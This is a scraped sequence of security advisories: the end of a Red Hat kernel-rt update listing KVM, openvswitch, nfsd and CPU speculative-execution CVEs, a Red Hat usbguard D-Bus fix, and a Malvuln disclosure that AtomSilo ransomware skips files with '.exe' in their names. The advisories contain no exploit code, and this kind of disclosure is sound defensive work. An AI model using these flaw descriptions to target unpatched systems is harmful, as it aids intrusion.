which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-9.0.z5 Batch  
(BZ#2137580)

* [DELL EMC 9.0-RT BUG] System is not booting into RT Kernel with perc12  
[kernel-rt] (BZ#2139864)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2069793 - CVE-2022-1158 kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
2084479 - CVE-2022-2639 kernel: openvswitch: integer underflow leads to out-of-bounds write in reserve_sfa_size()  
2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2090237 - CVE-2022-21123 hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: incomplete clean-up in specific special register write operations (aka DRPW)  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2103681 - CVE-2022-2959 kernel: watch queue race condition can lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
2141752 - CVE-2022-43945 kernel: nfsd buffer overflow by RPC message over TCP with garbage data

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.36.1.rt21.108.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j98NzjgjWX9erEAQgJMg//YsMeDDnxaD5147QWtdvcUXAEPUwgTclc  
q1S5Csnsli/lgNjEJxENBGin22RzGKBue9dl7BbKUQMTTYyrzZcnY75g7J6/tOzw  
UmhtxESE7Zge4ghgHtuTRpG5QEWvh73SYfFUyeIwby0QM6ONJX2nXViA88JXrnke  
Eggo5lSUOBjhvJZgWfx8VSCBWjshMdy7Lin0B+gGQuaQCumacHxNPNaHM/11j7bg  
2PXxqjleqhD1eyGfj9W1REd4HiE+6WYKT4OS3mPDESbv7lbEVMOxGgi0dBbt6JI3  
m8/bqoMh48fEAlf7H0UWw9/R/mY7zY2UMsAj10RHXMSeNr/QkNxzxNIJ7SYFU13C  
EKMEnUw/vS4JWET/JUgrsxu08sP9oD3IwQtPTJWTrq/mhBUdHlYjxkZADtk03XHk  
Y7GXVNeJe66XnJACQnlHuWtqTE6WidbM30Rc3wI0SAfx0hcYAPgoGfQWX7EFTp8s  
UlMyN7wd8qGbceNw6uk/k3rPcWW3EGeNw6HsUhN9eIVdRBBnlAk/i/O5ofShSYRr  
jctm+3T/7x04oFGJFo56wNfkyTy8W6Lj4Oxr7us7cJFJBW5l+T52re3XtIA0Uaib  
An7Ka+5uBvmooYnCQJyR4qnpNXB+Csdav+vOfrT5EKVvh33YlyB0O792J9EGqgSB  
CW+f3k/Ec3g=  
=3xRb  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8974-01

Red Hat Security Advisory 2022-8971-01 - The USBGuard software framework provides system protection against intrusive USB devices by implementing basic whitelisting and blacklisting capabilities based on device attributes. To enforce a user-defined policy, USBGuard uses the Linux kernel USB device authorization feature.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: usbguard security update  
Advisory ID:       RHSA-2022:8971-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8971  
Issue date:        2022-12-13  
CVE Names:         CVE-2019-25058   
=====================================================================

1. Summary:

An update for usbguard is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The USBGuard software framework provides system protection against  
intrusive USB devices by implementing basic whitelisting and blacklisting  
capabilities based on device attributes. To enforce a user-defined policy,  
USBGuard uses the Linux kernel USB device authorization feature.

Security Fix(es):

* usbguard: Fix unauthorized access via D-Bus (CVE-2019-25058)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2058465 - CVE-2019-25058 usbguard: Fix unauthorized access via D-Bus

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
usbguard-1.0.0-10.el9_0.1.src.rpm

aarch64:  
usbguard-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-tools-1.0.0-10.el9_0.1.aarch64.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.aarch64.rpm

noarch:  
usbguard-selinux-1.0.0-10.el9_0.1.noarch.rpm

ppc64le:  
usbguard-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-tools-1.0.0-10.el9_0.1.ppc64le.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.ppc64le.rpm

s390x:  
usbguard-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-tools-1.0.0-10.el9_0.1.s390x.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.s390x.rpm

x86_64:  
usbguard-1.0.0-10.el9_0.1.i686.rpm  
usbguard-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-dbus-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-dbus-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.i686.rpm  
usbguard-debugsource-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-notifier-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-notifier-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-tools-1.0.0-10.el9_0.1.x86_64.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.i686.rpm  
usbguard-tools-debuginfo-1.0.0-10.el9_0.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-25058  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j97NzjgjWX9erEAQhTcBAAn6skhJsg8EMtazzw72y0ldFQKdb8HtpT  
0Nt/ybt7pYJSOEFISnpk6P8hHRBvJp2YTWRvxNvqpL0Ufjy+oBvzTBAVek/tq+S9  
n88m4/mh171G5ZD5aDmzdvyVihET9WgsdFRpS0DUmPSzOur/1gHDVpArYTPOJpLT  
RPuj0iF30nNRESWLNMfhnbjOuyH/r5Loo2dSo2/dpFnCm4wTMLnz1towOwdi6CoX  
MFxewAF402iiyTgZOlJh900SvR8Sr6MU5EQREYCYVIIwfVlQSi3r5aQABO3D8UUZ  
ZMr3LsJ4Qkg1x9QU1jSQ2q3pqI1ArljOda1ky56/weDkcSxcd1ctkowvvv0sU7wV  
FI185U0AtMBEvQYe/RdngFcSw8istKR0cLJOzAn54Gc8Ua010fPNgnMfVPmcE2YR  
ugbQjpIHmU2zeaGA6GbYayXpdoA+gigBQvTh6hED1rYOCbp7wAXDA1L7obMLiO99  
usY2yeu5qwP45OtFiMPEUJX8pgyiGnxDcrNKB8NY3SBa+51v6CCRQ5lO57hyu88x  
t6CRAJft4kHCJypht9pXHDHZyijwfdJtTZd2/2aA7Be92sZc3NUpywwuJpkkFQ+p  
9t/4SePMOpjh+ViZ+sUsEWxEnjnHUFbIEPseP9kFW5vbbOCrYfFxnwURQEWsX+60  
gAn5cQIpi/I=  
=PGpJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8971-01

Ransom.Win64.AtomSilo malware suffers from a cryptography logic flaw.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/5559e9f5e1645f8554ea020a29a5a3ee.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Ransom.Win64.AtomSiloVulnerability: Crypto Logic FlawFamily: AtomSiloType: PE64MD5: 5559e9f5e1645f8554ea020a29a5a3eeVuln ID: MVID-2022-0666Disclosure: 12/14/2022Description: AtomSilo ransomware FAILS to encrypt non PE files that have a ".exe" in the filename. Creating specially crafted file names successfully evaded encryption for this malware sample.E.g. Test.exe.docxTest.exe.pdfTested successfully in a virtual machine environment.PoC Video:https://www.youtube.com/watch?v=xyBt9Ppb-xcExploit/PoC:Create files with ".exe" within the filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source

Packet Storm